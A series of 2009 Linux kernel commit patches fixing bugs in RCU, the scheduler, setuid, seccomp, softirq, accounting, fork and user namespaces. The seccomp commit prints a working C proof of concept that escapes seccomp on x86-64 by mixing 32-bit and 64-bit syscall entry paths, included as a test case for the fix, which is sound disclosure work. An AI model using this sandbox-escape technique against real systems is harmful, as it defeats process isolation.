From a682604838763981613e42015cd0e39f2989d6bb Mon Sep 17 00:00:00 2001 From: Paul E. McKenney Date: Wed, 25 Feb 2009 18:03:42 -0800 Subject: rcu: Teach RCU that idle task is not quiscent state at boot This patch fixes a bug located by Vegard Nossum with the aid of kmemcheck, updated based on review comments from Nick Piggin, Ingo Molnar, and Andrew Morton. And cleans up the variable-name and function-name language. ;-) The boot CPU runs in the context of its idle thread during boot-up. During this time, idle_cpu(0) will always return nonzero, which will fool Classic and Hierarchical RCU into deciding that a large chunk of the boot-up sequence is a big long quiescent state. This in turn causes RCU to prematurely end grace periods during this time. This patch changes the rcutree.c and rcuclassic.c rcu_check_callbacks() function to ignore the idle task as a quiescent state until the system has started up the scheduler in rest_init(), introducing a new non-API function rcu_idle_now_means_idle() to inform RCU of this transition. RCU maintains an internal rcu_idle_cpu_truthful variable to track this state, which is then used by rcu_check_callback() to determine if it should believe idle_cpu(). Because this patch has the effect of disallowing RCU grace periods during long stretches of the boot-up sequence, this patch also introduces Josh Triplett's UP-only optimization that makes synchronize_rcu() be a no-op if num_online_cpus() returns 1. This allows boot-time code that calls synchronize_rcu() to proceed normally. Note, however, that RCU callbacks registered by call_rcu() will likely queue up until later in the boot sequence. Although rcuclassic and rcutree can also use this same optimization after boot completes, rcupreempt must restrict its use of this optimization to the portion of the boot sequence before the scheduler starts up, given that an rcupreempt RCU read-side critical section may be preeempted. In addition, this patch takes Nick Piggin's suggestion to make the system_state global variable be __read_mostly. Changes since v4: o Changes the name of the introduced function and variable to be less emotional. ;-) Changes since v3: o WARN_ON(nr_context_switches() > 0) to verify that RCU switches out of boot-time mode before the first context switch, as suggested by Nick Piggin. Changes since v2: o Created rcu_blocking_is_gp() internal-to-RCU API that determines whether a call to synchronize_rcu() is itself a grace period. o The definition of rcu_blocking_is_gp() for rcuclassic and rcutree checks to see if but a single CPU is online. o The definition of rcu_blocking_is_gp() for rcupreempt checks to see both if but a single CPU is online and if the system is still in early boot. This allows rcupreempt to again work correctly if running on a single CPU after booting is complete. o Added check to rcupreempt's synchronize_sched() for there being but one online CPU. Tested all three variants both SMP and !SMP, booted fine, passed a short rcutorture test on both x86 and Power. Located-by: Vegard Nossum Tested-by: Vegard Nossum Tested-by: Paul E. McKenney Signed-off-by: Paul E. McKenney Signed-off-by: Ingo Molnar --- kernel/rcuclassic.c | 4 ++-- kernel/rcupdate.c | 12 ++++++++++++ kernel/rcupreempt.c | 3 +++ kernel/rcutree.c | 4 ++-- 4 files changed, 19 insertions(+), 4 deletions(-) (limited to 'kernel') diff --git a/kernel/rcuclassic.c b/kernel/rcuclassic.c index bd5a9003497c..654c640a6b9c 100644 --- a/kernel/rcuclassic.c +++ b/kernel/rcuclassic.c @@ -679,8 +679,8 @@ int rcu_needs_cpu(int cpu) void rcu_check_callbacks(int cpu, int user) { if (user || - (idle_cpu(cpu) && !in_softirq() && - hardirq_count() <= (1 << HARDIRQ_SHIFT))) { + (idle_cpu(cpu) && rcu_scheduler_active && + !in_softirq() && hardirq_count() <= (1 << HARDIRQ_SHIFT))) { /* * Get here if this CPU took its interrupt from user diff --git a/kernel/rcupdate.c b/kernel/rcupdate.c index d92a76a881aa..cae8a059cf47 100644 --- a/kernel/rcupdate.c +++ b/kernel/rcupdate.c @@ -44,6 +44,7 @@ #include #include #include +#include enum rcu_barrier { RCU_BARRIER_STD, @@ -55,6 +56,7 @@ static DEFINE_PER_CPU(struct rcu_head, rcu_barrier_head) = {NULL}; static atomic_t rcu_barrier_cpu_count; static DEFINE_MUTEX(rcu_barrier_mutex); static struct completion rcu_barrier_completion; +int rcu_scheduler_active __read_mostly; /* * Awaken the corresponding synchronize_rcu() instance now that a @@ -80,6 +82,10 @@ void wakeme_after_rcu(struct rcu_head *head) void synchronize_rcu(void) { struct rcu_synchronize rcu; + + if (rcu_blocking_is_gp()) + return; + init_completion(&rcu.completion); /* Will wake me after RCU finished. */ call_rcu(&rcu.head, wakeme_after_rcu); @@ -175,3 +181,9 @@ void __init rcu_init(void) __rcu_init(); } +void rcu_scheduler_starting(void) +{ + WARN_ON(num_online_cpus() != 1); + WARN_ON(nr_context_switches() > 0); + rcu_scheduler_active = 1; +} diff --git a/kernel/rcupreempt.c b/kernel/rcupreempt.c index 33cfc50781f9..5d59e850fb71 100644 --- a/kernel/rcupreempt.c +++ b/kernel/rcupreempt.c @@ -1181,6 +1181,9 @@ void __synchronize_sched(void) { struct rcu_synchronize rcu; + if (num_online_cpus() == 1) + return; /* blocking is gp if only one CPU! */ + init_completion(&rcu.completion); /* Will wake me after RCU finished. */ call_rcu_sched(&rcu.head, wakeme_after_rcu); diff --git a/kernel/rcutree.c b/kernel/rcutree.c index b2fd602a6f6f..97ce31579ec0 100644 --- a/kernel/rcutree.c +++ b/kernel/rcutree.c @@ -948,8 +948,8 @@ static void rcu_do_batch(struct rcu_data *rdp) void rcu_check_callbacks(int cpu, int user) { if (user || - (idle_cpu(cpu) && !in_softirq() && - hardirq_count() <= (1 << HARDIRQ_SHIFT))) { + (idle_cpu(cpu) && rcu_scheduler_active && + !in_softirq() && hardirq_count() <= (1 << HARDIRQ_SHIFT))) { /* * Get here if this CPU took its interrupt from user -- cgit v1.2.3 From cac64d00c256e65776d575e82aaf540632b66178 Mon Sep 17 00:00:00 2001 From: Hiroshi Shimamoto Date: Wed, 25 Feb 2009 09:59:26 -0800 Subject: sched_rt: don't start timer when rt bandwidth disabled Impact: fix incorrect condition check No need to start rt bandwidth timer when rt bandwidth is disabled. If this timer starts, it may stop at sched_rt_period_timer() on the first time. Signed-off-by: Hiroshi Shimamoto Acked-by: Peter Zijlstra Signed-off-by: Ingo Molnar --- kernel/sched.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'kernel') diff --git a/kernel/sched.c b/kernel/sched.c index 410eec404133..c3baa9653d1d 100644 --- a/kernel/sched.c +++ b/kernel/sched.c @@ -223,7 +223,7 @@ static void start_rt_bandwidth(struct rt_bandwidth *rt_b) { ktime_t now; - if (rt_bandwidth_enabled() && rt_b->rt_runtime == RUNTIME_INF) + if (!rt_bandwidth_enabled() || rt_b->rt_runtime == RUNTIME_INF) return; if (hrtimer_active(&rt_b->rt_period_timer)) -- cgit v1.2.3 From 54e991242850edc8c53f71fa5aa3ba7a93ce38f5 Mon Sep 17 00:00:00 2001 From: Dhaval Giani Date: Fri, 27 Feb 2009 15:13:54 +0530 Subject: sched: don't allow setuid to succeed if the user does not have rt bandwidth Impact: fix hung task with certain (non-default) rt-limit settings Corey Hickey reported that on using setuid to change the uid of a rt process, the process would be unkillable and not be running. This is because there was no rt runtime for that user group. Add in a check to see if a user can attach an rt task to its task group. On failure, return EINVAL, which is also returned in CONFIG_CGROUP_SCHED. Reported-by: Corey Hickey Signed-off-by: Dhaval Giani Acked-by: Peter Zijlstra Signed-off-by: Ingo Molnar --- include/linux/sched.h | 4 ++++ kernel/sched.c | 13 +++++++++++-- kernel/sys.c | 31 ++++++++++++++++++++----------- kernel/user.c | 18 ++++++++++++++++++ 4 files changed, 53 insertions(+), 13 deletions(-) (limited to 'kernel') diff --git a/include/linux/sched.h b/include/linux/sched.h index 8981e52c714f..8c216e057c94 100644 --- a/include/linux/sched.h +++ b/include/linux/sched.h @@ -2291,9 +2291,13 @@ extern long sched_group_rt_runtime(struct task_group *tg); extern int sched_group_set_rt_period(struct task_group *tg, long rt_period_us); extern long sched_group_rt_period(struct task_group *tg); +extern int sched_rt_can_attach(struct task_group *tg, struct task_struct *tsk); #endif #endif +extern int task_can_switch_user(struct user_struct *up, + struct task_struct *tsk); + #ifdef CONFIG_TASK_XACCT static inline void add_rchar(struct task_struct *tsk, ssize_t amt) { diff --git a/kernel/sched.c b/kernel/sched.c index c3baa9653d1d..8e2558c2ba67 100644 --- a/kernel/sched.c +++ b/kernel/sched.c @@ -9224,6 +9224,16 @@ static int sched_rt_global_constraints(void) return ret; } + +int sched_rt_can_attach(struct task_group *tg, struct task_struct *tsk) +{ + /* Don't accept realtime tasks when there is no way for them to run */ + if (rt_task(tsk) && tg->rt_bandwidth.rt_runtime == 0) + return 0; + + return 1; +} + #else /* !CONFIG_RT_GROUP_SCHED */ static int sched_rt_global_constraints(void) { @@ -9317,8 +9327,7 @@ cpu_cgroup_can_attach(struct cgroup_subsys *ss, struct cgroup *cgrp, struct task_struct *tsk) { #ifdef CONFIG_RT_GROUP_SCHED - /* Don't accept realtime tasks when there is no way for them to run */ - if (rt_task(tsk) && cgroup_tg(cgrp)->rt_bandwidth.rt_runtime == 0) + if (!sched_rt_can_attach(cgroup_tg(cgrp), tsk)) return -EINVAL; #else /* We don't support RT-tasks being in separate groups */ diff --git a/kernel/sys.c b/kernel/sys.c index f145c415bc16..37f458e6882a 100644 --- a/kernel/sys.c +++ b/kernel/sys.c @@ -559,7 +559,7 @@ error: abort_creds(new); return retval; } - + /* * change the user struct in a credentials set to match the new UID */ @@ -571,6 +571,11 @@ static int set_user(struct cred *new) if (!new_user) return -EAGAIN; + if (!task_can_switch_user(new_user, current)) { + free_uid(new_user); + return -EINVAL; + } + if (atomic_read(&new_user->processes) >= current->signal->rlim[RLIMIT_NPROC].rlim_cur && new_user != INIT_USER) { @@ -631,10 +636,11 @@ SYSCALL_DEFINE2(setreuid, uid_t, ruid, uid_t, euid) goto error; } - retval = -EAGAIN; - if (new->uid != old->uid && set_user(new) < 0) - goto error; - + if (new->uid != old->uid) { + retval = set_user(new); + if (retval < 0) + goto error; + } if (ruid != (uid_t) -1 || (euid != (uid_t) -1 && euid != old->uid)) new->suid = new->euid; @@ -680,9 +686,10 @@ SYSCALL_DEFINE1(setuid, uid_t, uid) retval = -EPERM; if (capable(CAP_SETUID)) { new->suid = new->uid = uid; - if (uid != old->uid && set_user(new) < 0) { - retval = -EAGAIN; - goto error; + if (uid != old->uid) { + retval = set_user(new); + if (retval < 0) + goto error; } } else if (uid != old->uid && uid != new->suid) { goto error; @@ -734,11 +741,13 @@ SYSCALL_DEFINE3(setresuid, uid_t, ruid, uid_t, euid, uid_t, suid) goto error; } - retval = -EAGAIN; if (ruid != (uid_t) -1) { new->uid = ruid; - if (ruid != old->uid && set_user(new) < 0) - goto error; + if (ruid != old->uid) { + retval = set_user(new); + if (retval < 0) + goto error; + } } if (euid != (uid_t) -1) new->euid = euid; diff --git a/kernel/user.c b/kernel/user.c index 3551ac742395..6a9b696128c8 100644 --- a/kernel/user.c +++ b/kernel/user.c @@ -362,6 +362,24 @@ static void free_user(struct user_struct *up, unsigned long flags) #endif +#if defined(CONFIG_RT_GROUP_SCHED) && defined(CONFIG_USER_SCHED) +/* + * We need to check if a setuid can take place. This function should be called + * before successfully completing the setuid. + */ +int task_can_switch_user(struct user_struct *up, struct task_struct *tsk) +{ + + return sched_rt_can_attach(up->tg, tsk); + +} +#else +int task_can_switch_user(struct user_struct *up, struct task_struct *tsk) +{ + return 1; +} +#endif + /* * Locate the user_struct for the passed UID. If found, take a ref on it. The * caller must undo that ref with free_uid(). -- cgit v1.2.3 From 5b1017404aea6d2e552e991b3fd814d839e9cd67 Mon Sep 17 00:00:00 2001 From: Roland McGrath Date: Fri, 27 Feb 2009 23:25:54 -0800 Subject: x86-64: seccomp: fix 32/64 syscall hole On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include #include #include #include #include #include #include int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds --- arch/mips/include/asm/seccomp.h | 1 - arch/powerpc/include/asm/compat.h | 5 +++++ arch/powerpc/include/asm/seccomp.h | 4 ---- arch/sparc/include/asm/compat.h | 5 +++++ arch/sparc/include/asm/seccomp.h | 6 ------ arch/x86/include/asm/seccomp_32.h | 6 ------ arch/x86/include/asm/seccomp_64.h | 8 -------- kernel/seccomp.c | 7 ++++--- 8 files changed, 14 insertions(+), 28 deletions(-) (limited to 'kernel') diff --git a/arch/mips/include/asm/seccomp.h b/arch/mips/include/asm/seccomp.h index 36ed44070256..a6772e9507f5 100644 --- a/arch/mips/include/asm/seccomp.h +++ b/arch/mips/include/asm/seccomp.h @@ -1,6 +1,5 @@ #ifndef __ASM_SECCOMP_H -#include #include #define __NR_seccomp_read __NR_read diff --git a/arch/powerpc/include/asm/compat.h b/arch/powerpc/include/asm/compat.h index d811a8cd7b58..4774c2f92232 100644 --- a/arch/powerpc/include/asm/compat.h +++ b/arch/powerpc/include/asm/compat.h @@ -210,5 +210,10 @@ struct compat_shmid64_ds { compat_ulong_t __unused6; }; +static inline int is_compat_task(void) +{ + return test_thread_flag(TIF_32BIT); +} + #endif /* __KERNEL__ */ #endif /* _ASM_POWERPC_COMPAT_H */ diff --git a/arch/powerpc/include/asm/seccomp.h b/arch/powerpc/include/asm/seccomp.h index 853765eb1f65..00c1d9133cfe 100644 --- a/arch/powerpc/include/asm/seccomp.h +++ b/arch/powerpc/include/asm/seccomp.h @@ -1,10 +1,6 @@ #ifndef _ASM_POWERPC_SECCOMP_H #define _ASM_POWERPC_SECCOMP_H -#ifdef __KERNEL__ -#include -#endif - #include #define __NR_seccomp_read __NR_read diff --git a/arch/sparc/include/asm/compat.h b/arch/sparc/include/asm/compat.h index f260b58f5ce9..0e706257918f 100644 --- a/arch/sparc/include/asm/compat.h +++ b/arch/sparc/include/asm/compat.h @@ -240,4 +240,9 @@ struct compat_shmid64_ds { unsigned int __unused2; }; +static inline int is_compat_task(void) +{ + return test_thread_flag(TIF_32BIT); +} + #endif /* _ASM_SPARC64_COMPAT_H */ diff --git a/arch/sparc/include/asm/seccomp.h b/arch/sparc/include/asm/seccomp.h index 7fcd9968192b..adca1bce41d4 100644 --- a/arch/sparc/include/asm/seccomp.h +++ b/arch/sparc/include/asm/seccomp.h @@ -1,11 +1,5 @@ #ifndef _ASM_SECCOMP_H -#include /* already defines TIF_32BIT */ - -#ifndef TIF_32BIT -#error "unexpected TIF_32BIT on sparc64" -#endif - #include #define __NR_seccomp_read __NR_read diff --git a/arch/x86/include/asm/seccomp_32.h b/arch/x86/include/asm/seccomp_32.h index a6ad87b352c4..b811d6f5780c 100644 --- a/arch/x86/include/asm/seccomp_32.h +++ b/arch/x86/include/asm/seccomp_32.h @@ -1,12 +1,6 @@ #ifndef _ASM_X86_SECCOMP_32_H #define _ASM_X86_SECCOMP_32_H -#include - -#ifdef TIF_32BIT -#error "unexpected TIF_32BIT on i386" -#endif - #include #define __NR_seccomp_read __NR_read diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h index 4171bb794e9e..84ec1bd161a5 100644 --- a/arch/x86/include/asm/seccomp_64.h +++ b/arch/x86/include/asm/seccomp_64.h @@ -1,14 +1,6 @@ #ifndef _ASM_X86_SECCOMP_64_H #define _ASM_X86_SECCOMP_64_H -#include - -#ifdef TIF_32BIT -#error "unexpected TIF_32BIT on x86_64" -#else -#define TIF_32BIT TIF_IA32 -#endif - #include #include diff --git a/kernel/seccomp.c b/kernel/seccomp.c index ad64fcb731f2..57d4b13b631d 100644 --- a/kernel/seccomp.c +++ b/kernel/seccomp.c @@ -8,6 +8,7 @@ #include #include +#include /* #define SECCOMP_DEBUG 1 */ #define NR_SECCOMP_MODES 1 @@ -22,7 +23,7 @@ static int mode1_syscalls[] = { 0, /* null terminated */ }; -#ifdef TIF_32BIT +#ifdef CONFIG_COMPAT static int mode1_syscalls_32[] = { __NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32, 0, /* null terminated */ @@ -37,8 +38,8 @@ void __secure_computing(int this_syscall) switch (mode) { case 1: syscall = mode1_syscalls; -#ifdef TIF_32BIT - if (test_thread_flag(TIF_32BIT)) +#ifdef CONFIG_COMPAT + if (is_compat_task()) syscall = mode1_syscalls_32; #endif do { -- cgit v1.2.3 From 64ca5ab913f1594ef316556e65f5eae63ff50cee Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 4 Mar 2009 12:11:56 -0800 Subject: rcu: increment quiescent state counter in ksoftirqd() If a machine is flooded by network frames, a cpu can loop 100% of its time inside ksoftirqd() without calling schedule(). This can delay RCU grace period to insane values. Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem. Paul: "This regression was a result of the recent change from "schedule()" to "cond_resched()", which got rid of that quiescent state in the common case where a reschedule is not needed". Signed-off-by: Eric Dumazet Reviewed-by: Paul E. McKenney Signed-off-by: Andrew Morton Signed-off-by: Ingo Molnar --- kernel/softirq.c | 1 + 1 file changed, 1 insertion(+) (limited to 'kernel') diff --git a/kernel/softirq.c b/kernel/softirq.c index bdbe9de9cd8d..9041ea7948fe 100644 --- a/kernel/softirq.c +++ b/kernel/softirq.c @@ -626,6 +626,7 @@ static int ksoftirqd(void * __bind_cpu) preempt_enable_no_resched(); cond_resched(); preempt_disable(); + rcu_qsctr_inc((long)__bind_cpu); } preempt_enable(); set_current_state(TASK_INTERRUPTIBLE); -- cgit v1.2.3 From 6d5b5acca9e566515ef3f1ed617e7295c4f94345 Mon Sep 17 00:00:00 2001 From: Heiko Carstens Date: Mon, 9 Mar 2009 13:31:59 +0100 Subject: Fix fixpoint divide exception in acct_update_integrals Frans Pop reported the crash below when running an s390 kernel under Hercules: Kernel BUG at 000738b4 verbose debug info unavailable! fixpoint divide exception: 0009 #1! SMP Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot dm_mod dasd_eckd_mod dasd_mod CPU: 0 Not tainted 2.6.27.19 #13 Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18) Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0 Krnl GPRS: 00000000 000007d0 7fffffff fffff830 00000000 ffffffff 00000002 0f9ed9b8 00000000 00008ca0 00000000 0f9ed9b8 0f9edda4 8007386e 0f4f7ec8 0f4f7e98 Krnl Code: 800738aa: a71807d0 lhi %r1,2000 800738ae: 8c200001 srdl %r2,1 800738b2: 1d21 dr %r2,%r1 >800738b4: 5810d10e l %r1,270(%r13) 800738b8: 1823 lr %r2,%r3 800738ba: 4130f060 la %r3,96(%r15) 800738be: 0de1 basr %r14,%r1 800738c0: 5800f060 l %r0,96(%r15) Call Trace: ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c) <0000000000038502>! do_exit+0x106/0x7c0 <0000000000038c36>! do_group_exit+0x7a/0xb4 <0000000000038c8e>! SyS_exit_group+0x1e/0x30 <0000000000021c28>! sysc_do_restart+0x12/0x16 <0000000077e7e924>! 0x77e7e924 Reason for this is that cpu time accounting usually only happens from interrupt context, but acct_update_integrals gets also called from process context with interrupts enabled. So in acct_update_integrals we may end up with the following scenario: Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt happens which updates accouting values. This causes acct_timexpd to be greater than the former stime + utime. The subsequent calculation of dtime = cputime_sub(time, tsk->acct_timexpd); will be negative and the division performed by cputime_to_jiffies(dtime) will generate an exception since the result won't fit into a 32 bit register. In order to fix this just always disable interrupts while accessing any of the accounting values. Reported by: Frans Pop Tested by: Frans Pop Cc: stable@kernel.org Cc: Martin Schwidefsky Signed-off-by: Heiko Carstens Signed-off-by: Linus Torvalds --- kernel/tsacct.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) (limited to 'kernel') diff --git a/kernel/tsacct.c b/kernel/tsacct.c index 43f891b05a4b..00d59d048edf 100644 --- a/kernel/tsacct.c +++ b/kernel/tsacct.c @@ -122,8 +122,10 @@ void acct_update_integrals(struct task_struct *tsk) if (likely(tsk->mm)) { cputime_t time, dtime; struct timeval value; + unsigned long flags; u64 delta; + local_irq_save(flags); time = tsk->stime + tsk->utime; dtime = cputime_sub(time, tsk->acct_timexpd); jiffies_to_timeval(cputime_to_jiffies(dtime), &value); @@ -131,10 +133,12 @@ void acct_update_integrals(struct task_struct *tsk) delta = delta * USEC_PER_SEC + value.tv_usec; if (delta == 0) - return; + goto out; tsk->acct_timexpd = time; tsk->acct_rss_mem1 += delta * get_mm_rss(tsk->mm); tsk->acct_vm_mem1 += delta * tsk->mm->total_vm; + out: + local_irq_restore(flags); } } -- cgit v1.2.3 From 2d5516cbb9daf7d0e342a2e3b0fc6f8c39a81205 Mon Sep 17 00:00:00 2001 From: Oleg Nesterov Date: Mon, 2 Mar 2009 22:58:45 +0100 Subject: copy_process: fix CLONE_PARENT && parent_exec_id interaction CLONE_PARENT can fool the ->self_exec_id/parent_exec_id logic. If we re-use the old parent, we must also re-use ->parent_exec_id to make sure exit_notify() sees the right ->xxx_exec_id's when the CLONE_PARENT'ed task exits. Also, move down the "p->parent_exec_id = p->self_exec_id" thing, to place two different cases together. Signed-off-by: Oleg Nesterov Cc: Roland McGrath Cc: Andrew Morton Cc: David Howells Cc: Serge E. Hallyn Signed-off-by: Linus Torvalds --- kernel/fork.c | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) (limited to 'kernel') diff --git a/kernel/fork.c b/kernel/fork.c index a66fbde20715..4854c2c4a82e 100644 --- a/kernel/fork.c +++ b/kernel/fork.c @@ -1179,10 +1179,6 @@ static struct task_struct *copy_process(unsigned long clone_flags, #endif clear_all_latency_tracing(p); - /* Our parent execution domain becomes current domain - These must match for thread signalling to apply */ - p->parent_exec_id = p->self_exec_id; - /* ok, now we should be set up.. */ p->exit_signal = (clone_flags & CLONE_THREAD) ? -1 : (clone_flags & CSIGNAL); p->pdeath_signal = 0; @@ -1220,10 +1216,13 @@ static struct task_struct *copy_process(unsigned long clone_flags, set_task_cpu(p, smp_processor_id()); /* CLONE_PARENT re-uses the old parent */ - if (clone_flags & (CLONE_PARENT|CLONE_THREAD)) + if (clone_flags & (CLONE_PARENT|CLONE_THREAD)) { p->real_parent = current->real_parent; - else + p->parent_exec_id = current->parent_exec_id; + } else { p->real_parent = current; + p->parent_exec_id = current->self_exec_id; + } spin_lock(¤t->sighand->siglock); -- cgit v1.2.3 From be50b8342dead8cacf57d4839240106b225d31f5 Mon Sep 17 00:00:00 2001 From: Dhaval Giani Date: Tue, 10 Mar 2009 12:55:56 -0700 Subject: kernel/user.c: fix a memory leak when freeing up non-init usernamespaces users We were returning early in the sysfs directory cleanup function if the user belonged to a non init usernamespace. Due to this a lot of the cleanup was not done and we were left with a leak. Fix the leak. Reported-by: Serge Hallyn Signed-off-by: Dhaval Giani Acked-by: Serge Hallyn Tested-by: Serge Hallyn Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- kernel/user.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) (limited to 'kernel') diff --git a/kernel/user.c b/kernel/user.c index 6a9b696128c8..fbb300e6191f 100644 --- a/kernel/user.c +++ b/kernel/user.c @@ -286,14 +286,12 @@ int __init uids_sysfs_init(void) /* work function to remove sysfs directory for a user and free up * corresponding structures. */ -static void remove_user_sysfs_dir(struct work_struct *w) +static void cleanup_user_struct(struct work_struct *w) { struct user_struct *up = container_of(w, struct user_struct, work); unsigned long flags; int remove_user = 0; - if (up->user_ns != &init_user_ns) - return; /* Make uid_hash_remove() + sysfs_remove_file() + kobject_del() * atomic. */ @@ -312,9 +310,11 @@ static void remove_user_sysfs_dir(struct work_struct *w) if (!remove_user) goto done; - kobject_uevent(&up->kobj, KOBJ_REMOVE); - kobject_del(&up->kobj); - kobject_put(&up->kobj); + if (up->user_ns == &init_user_ns) { + kobject_uevent(&up->kobj, KOBJ_REMOVE); + kobject_del(&up->kobj); + kobject_put(&up->kobj); + } sched_destroy_user(up); key_put(up->uid_keyring); @@ -335,7 +335,7 @@ static void free_user(struct user_struct *up, unsigned long flags) atomic_inc(&up->__count); spin_unlock_irqrestore(&uidhash_lock, flags); - INIT_WORK(&up->work, remove_user_sysfs_dir); + INIT_WORK(&up->work, cleanup_user_struct); schedule_work(&up->work); } -- cgit v1.2.3